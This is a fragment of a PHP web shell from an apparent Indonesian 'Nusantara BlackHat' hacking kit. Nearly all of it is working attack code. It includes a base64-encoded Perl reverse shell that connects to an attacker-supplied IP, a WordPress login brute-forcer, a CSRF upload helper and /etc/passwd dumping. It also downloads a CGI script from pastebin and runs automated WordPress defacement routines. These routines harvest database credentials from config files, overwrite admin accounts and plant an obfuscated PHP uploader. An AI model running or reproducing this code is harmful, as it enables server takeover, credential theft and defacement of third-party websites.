	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
	if(isset($_POST['sub_bc'])) {
		$f_bc = fopen("/tmp/bc.pl", "w");
		fwrite($f_bc, base64_decode($bind_connect_p));
		fclose($f_bc);

		$ipbc = $_POST['ip_bc'];
		$port = $_POST['port_bc'];
		$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
		sleep(1);
		echo "<pre>".$out."n".exe("ps aux | grep bc.pl")."</pre>";
		unlink("/tmp/bc.pl");
	}
} elseif($_GET['do'] == 'kill') {
	if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
			die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
		else
			echo '<center>unlink failed!</center>';
} elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
}elseif($_GET['do'] == 'ports') {
    echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
    echo '<div class="content">';
    echo '<form action="" method="post">';
    
    if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
        $start = strip_tags($_POST['start']);
        $end = strip_tags($_POST['end']);
        $host = strip_tags($_POST['host']);
        for($i = $start; $i<=$end; $i++){
            $fp = @fsockopen($host, $i, $errno, $errstr, 3);
            if($fp){
                echo 'Port '.$i.' is <font color=green>open</font><br>';
            }
            flush();
        }
    } else {
        echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
              Host: <input type="text" name="host" value="localhost"/><br /><br />
              Port start: <input type="text" name="start" value="0"/><br /><br />
              Port end:<input type="text" name="end" value="5000"/><br /><br />
              <input type="submit" value="Scan Ports" />
              </form></center><br /><br />';
    echo '</div></table></td>';

}
}
  /////////////////////////////
  elseif($_GET['do'] == 'wpbf') {

echo "<title>Wp-Brute Force</title>";

include("../head.php");



set_time_limit(0);
error_reporting(0);

class lugi{
 
        private $host;
        private $user;
        private $open;
        private $lista;
 
  public function banner() {
   echo("    <html>
    <head>
    <style type='text/css'>
	
 textarea {
	 	width: 100%;
	height: 400px;
 }
 

    .ext{
        color: blue;
    }
 
    .area{
        width:400px;
        height:350px;
        resize:none;
    }
 
    </style>
    </head>
    <body>
    <h1><center>WordPress Brute Force</center></h1>
    <form action='' method='POST'>
    <center>Host:<input type='text' name='host' class='con7' placeholder='http://tager.com/' size='40' > </center><br>
    <center>User:<input type='text' name='user' class='con7' value='admin' size='25'>    </center><br>
    <center>Wordlist</center>
    <center><textarea class='form-control con7' rows='10' name='lista'></textarea><br><br><center>
    <center><input type='Submit' class='kntd' value='Start'></center>
    </form>
    </body>
   </html>");

}
 
    public function extract_post() {
         $this->host = $_POST["host"];
         $this->user = $_POST["user"];
         $this->open = $_POST["lista"];
       }
 
       public function Xregex() {
         if(preg_match("@/wp-login.php@", $this->host)) {
             return true;
         } else {
            $this->host = $_POST["host"]."/wp-login.php";
         }
     }
 
      public function brute() {
           $lista = array_filter(explode("
", $this->open));
           foreach($lista as $this->lista) {
           for($i=0; $i < count($this->lista); $i++) {
                        $this->Xcurl();
                     }
              }
       }
 
        private function cool() {
            echo "[+] Host:"."<font color='white'>{$this->host}</font>";
            echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
            echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
        }
 
        private function Xcurl() {
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $this->host);
            curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
            $exec = curl_exec($curl);
            $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
            $this->cool();
            if($http == 302) {
                 echo "<font color='green'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
                 break;
            } else {
                echo "<font color='red'><br/>[+] Failed</font><br>";
            }
                curl_close($curl);
        }
}
 
$wp = new lugi();
$wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
$wp->banner();
$wp->extract_post();
$wp->Xregex();
$wp->brute();
        
echo "<br>";


}


////////////////////////////
elseif($_GET['do'] == 'csrf') {
?>      <html>
<title>CSRF EXPLOITER ONLINE</title>
<center><br><br><h2> CSRF ONLINE</h2>
<br><br>
<font color=lime>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
<center>
<form method="post">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
POST File: <input type="text" name="data" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="go" value="Lock!">
</form>
<?php
$url = $_POST['url'];
$data = $_POST['data'];
$submit = $_POST['go'];
if($submit) {
    echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input type='submit' name='ok' value='Upload'></form";
}
?>
</form>
</html>
<?php
 
} 
 
 /////////////
 elseif ($_GET['do'] == 'hashid'){
if(isset($_POST['gethash'])){
		$hash = $_POST['hash'];
		if(strlen($hash)==32){
			$hashresult = "MD5 Hash";
		}elseif(strlen($hash)==40){
			$hashresult = "SHA-1 Hash/ /MySQL5 Hash";
		}elseif(strlen($hash)==13){
			$hashresult = "DES(Unix) Hash";
		}elseif(strlen($hash)==16){
			$hashresult = "MySQL Hash / /DES(Oracle Hash)";
		}elseif(strlen($hash)==41){
			$GetHashChar = substr($hash, 40);
			if($GetHashChar == "*"){
				$hashresult = "MySQL5 Hash"; 
			}	
		}elseif(strlen($hash)==64){
			$hashresult = "SHA-256 Hash";
		}elseif(strlen($hash)==96){
			$hashresult = "SHA-384 Hash";
		}elseif(strlen($hash)==128){
			$hashresult = "SHA-512 Hash";
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$1$')){
				$hashresult = "MD5(Unix) Hash";
			} 	
		}elseif(strlen($hash)==37){
			if(strstr($hash, '$apr1$')){
				$hashresult = "MD5(APR) Hash";
			} 	
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$H$')){
				$hashresult = "MD5(phpBB3) Hash";
			} 	
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$P$')){
				$hashresult = "MD5(Wordpress) Hash";
			} 	
		}elseif(strlen($hash)==39){
			if(strstr($hash, '$5$')){
				$hashresult = "SHA-256(Unix) Hash";
			} 	
		}elseif(strlen($hash)==39){
			if(strstr($hash, '$6$')){
				$hashresult = "SHA-512(Unix) Hash";
			} 	
		}elseif(strlen($hash)==24){
			if(strstr($hash, '==')){
				$hashresult = "MD5(Base-64) Hash";
			} 	
		}else{
			$hashresult = "Hash type not found";
		}
	}else{
		$hashresult = "Not Hash Entered";
	}
	
	?>
	<center><br><Br><br>
	
		<form action="" method="POST">
		<tr>
		<table class="tabnet">
		<th colspan="5">Hash Identification</th>
		<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>	<td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
		<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
	</table></tr></form>
	</center>
	
	<?php
 }

 ///////////////////////
 elseif($_GET['do'] == 'passwbypass') {
	echo '<center>Bypass etc/passw With:<br>
<table style="width:50%">
  <tr>
    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
    <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>	
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>		
    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
</tr></table>Bypass User With : <table style="width:50%">
<tr>
    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>	
    <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>		
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
</tr>
</table><br>';


if ($_POST['awkuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
echo "</textarea><br>";
}
if ($_POST['systuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo system("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['passthuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo passthru("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['exuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo exec("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['shexuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("ls /var/mail");
echo "</textarea><br>";
}
if($_POST['syst'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo system("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['passth'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo passthru("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['ex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['shex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo shell_exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
echo '<center>';
if($_POST['melex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
for($uid=0;$uid<60000;$uid++){ 
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "n";
}
}
echo"</textarea><br><br>";
}
} 
/////////////////////////////
elseif($_GET['do'] == 'cgi') {
    $cgi_dir = mkdir('idx_cgi', 0755);
    $file_cgi = "idx_cgi/cgi.izo";
    $isi_htcgi = "AddHandler cgi-script .izo";
    $htcgi = fopen(".htaccess", "w");
    fwrite($htcgi, $isi_htcgi);
    fclose($htcgi);
    $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
    $cgi = fopen($file_cgi, "w");
    fwrite($cgi, $cgi_script);
    fclose($cgi);
    chmod($file_cgi, 0755);
    echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
} elseif($_GET['do'] == 'fake_root') {
    ob_start();
    $cwd = getcwd();
    $ambil_user = explode("/", $cwd);
    $user = $ambil_user[2];
    if($_POST['reverse']) {
        $site = explode("rn", $_POST['url']);
        $file = $_POST['file'];
        foreach($site as $url) {
            $cek = getsource("$url/~$user/$file");
            if(preg_match("/hacked/i", $cek)) {
                echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
            }
        }
    } else {
        echo "<center><form method='post'>
        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
        Domain: <br>
        <textarea style='width: 450px; height: 250px;' name='url'>";
        reverse($_SERVER['HTTP_HOST']);
        echo "</textarea><br>
        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
        </form><br>
        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
    }
} elseif($_GET['do'] == 'adminer') {
    $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
    function adminer($url, $isi) {
        $fp = fopen($isi, "w");
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL, $url);
              curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_FILE, $fp);
        return curl_exec($ch);
              curl_close($ch);
        fclose($fp);
        ob_flush();
        flush();
    }
    if(file_exists('adminer.php')) {
        echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
    } else {
        if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
            echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
        } else {
            echo "<center><font color=red>gagal buat file adminer</font></center>";
        }
    }
} elseif($_GET['do'] == 'auto_dwp') {
    if($_POST['auto_deface_wp']) {
        function anucurl($sites) {
            $ch = curl_init($sites);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        function lohgin($cek, $web, $userr, $pass, $wp_submit) {
            $post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
            $ch = curl_init($cek);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_POST, 1);
                  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        $scan = $_POST['link_config'];
        $link_config = scandir($scan);
        $script = htmlspecialchars($_POST['script']);
        $user = "nusantarablackhat";
        $pass = "nusantarablackhat";
        $passx = md5($pass);
        foreach($link_config as $dir_config) {
            if(!is_file("$scan/$dir_config")) continue;
            $config = file_get_contents("$scan/$dir_config");
            if(preg_match("/WordPress/", $config)) {
                $dbhost = ambilkata($config,"DB_HOST', '","'");
                $dbuser = ambilkata($config,"DB_USER', '","'");
                $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                $dbname = ambilkata($config,"DB_NAME', '","'");
                $dbprefix = ambilkata($config,"table_prefix  = '","'");
                $prefix = $dbprefix."users";
                $option = $dbprefix."options";
                $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                $db = mysql_select_db($dbname);
                $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                $result = mysql_fetch_array($q);
                $id = $result[ID];
                $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                $result2 = mysql_fetch_array($q2);
                $target = $result2[option_value];
                if($target == '') {                
                    echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
                } else {
                    echo "[+] $target <br>";
                }
                $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
                if(!$conn OR !$db OR !$update) {
                    echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
                    mysql_close($conn);
                } else {
                    $site = "$target/wp-login.php";
                    $site2 = "$target/wp-admin/theme-install.php?upload";
                    $b1 = anucurl($site2);
                    $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
                    $b = lohgin($site, $site2, $user, $pass, $wp_sub);
                    $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
                    $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
                    $www = "m.php";
                    $fp5 = fopen($www,"w");
                    fputs($fp5,$upload3);
                    $post2 = array(
                            "_wpnonce" => "$anu2",
                            "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                            "themezip" => "@$www",
                            "install-theme-submit" => "Install Now",
                            );
                    $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
                          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                          curl_setopt($ch, CURLOPT_POST, 1);
                          curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
                          curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                          curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                          curl_setopt($ch, CURLOPT_COOKIESESSION, true);
                    $data3 = curl_exec($ch);
                          curl_close($ch);
                    $y = date("Y");
                    $m = date("m");
                    $namafile = "id.php";
                    $fpi = fopen($namafile,"w");
                    fputs($fpi,$script);
                    $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
                           curl_setopt($ch6, CURLOPT_POST, true);
                           curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
                           curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
                           curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
                           curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
                           curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
                    $postResult = curl_exec($ch6);
                           curl_close($ch6);
                    $as = "$target/k.php";
                    $bs = anucurl($as);
                    if(preg_match("#$script#is", $bs)) {
                        echo "[+] <font color='lime'>berhasil mepes...</font><br>";
                        echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
                        } else {
                        echo "[-] <font color='red'>gagal mepes...</font><br>";
                        echo "[!!] coba aja manual: <br>";
                        echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
                        echo "[+] username: <font color=lime>$user</font><br>";
                        echo "[+] password: <font color=lime>$pass</font><br><br>";    
                        }
                    mysql_close($conn);
                }
            }
        }
    } else {
        echo "<center><h1>WordPress Auto Deface</h1>
        <form method='post'>
        <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
        <input type='text' name='script' height='10' size='50' placeholder='Hacked by Nusantara BlackHat' required><br>
        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
        </form>
        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
        </center>";
    }
} elseif($_GET['do'] == 'auto_dwp2') {
    if($_POST['auto_deface_wp']) {
        function anucurl($sites) {
            $ch = curl_init($sites);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION,true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        function lohgin($cek, $web, $userr, $pass, $wp_submit) {
            $post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
            $ch = curl_init($cek);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_POST, 1);
                  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        $link = explode("
", $_POST['link']);
        $script = htmlspecialchars($_POST['script']);
        $user = "nusantarablackhat";
        $pass = "nusantarablackhat";
        $passx = md5($pass);
        foreach($link as $dir_config) {
            $config = anucurl($dir_config);
            $dbhost = ambilkata($config,"DB_HOST', '","'");
            $dbuser = ambilkata($config,"DB_USER', '","'");
            $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
            $dbname = ambilkata($config,"DB_NAME', '","'");
            $dbprefix = ambilkata($config,"table_prefix  = '","'");
            $prefix = $dbprefix."users";
            $option = $dbprefix."options";
            $conn = mysql_connect($dbhost,$dbuser,$dbpass);
            $db = mysql_select_db($dbname);
            $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
            $result = mysql_fetch_array($q);
            $id = $result[ID];
            $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
            $result2 = mysql_fetch_array($q2);
            $target = $result2[option_value];
            if($target == '') {                
                echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
            } else {
                echo "[+] $target <br>";
            }
            $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
            if(!$conn OR !$db OR !$update) {
                echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
                mysql_close($conn);
            } else {
                $site = "$target/wp-login.php";
                $site2 = "$target/wp-admin/theme-install.php?upload";
                $b1 = anucurl($site2);
                $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
                $b = lohgin($site, $site2, $user, $pass, $wp_sub);
                $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
                $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
                $www = "m.php";
                $fp5 = fopen($www,"w");
                fputs($fp5,$upload3);
                $post2 = array(
                        "_wpnonce" => "$anu2",
                        "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                        "themezip" => "@$www",
                        "install-theme-submit" => "Install Now",
                        );
                $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
                      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                      curl_setopt($ch, CURLOPT_POST, 1);
                      curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
                      curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                      curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
                $data3 = curl_exec($ch);
                      curl_close($ch);
                $y = date("Y");
                $m = date("m");
                $namafile = "id.php";
                $fpi = fopen($namafile,"w");
                fputs($fpi,$script);
                $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
                       curl_setopt($ch6, CURLOPT_POST, true);
                       curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
                       curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
                       curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
                       curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
                       curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
                $postResult = curl_exec($ch6);
                       curl_close($ch6);
                $as = "$target/k.php";
                $bs = anucurl($as);
                if(preg_match("#$script#is", $bs)) {
                    echo "[+] <font color='lime'>berhasil mepes...</font><br>";
                    echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
                    } else {
                    echo "[-] <font color='red'>gagal mepes...</font><br>";
                    echo "[!!] coba aja manual: <br>";
                    echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
                    echo "[+] username: <font color=lime>$user</font><br>";
                    echo "[+] password: <font color=lime>$pass</font><br><br>";    
                    }
                mysql_close($conn);
            }
        }
    } else {
        echo "<center><h1>WordPress Auto Deface V.2</h1>
        <form method='post'>
        Link Config: <br>
        <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
        <input type='text' name='script' height='10' size='50' placeholder='Hacked by Nusantara BlackHat' required><br>
        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
        </form></center>";
    }
} elseif($_GET['do'] == 'network') {
    echo "<form method='post'>
    <u>Bind Port:</u> <br>
    PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
    <input type='submit' name='sub_bp' value='>>'>
    </form>
    <form method='post'>
    <u>Back Connect:</u> <br>
    Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
    PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
    <input type='submit' name='sub_bc' value='>>'>
    </form>";
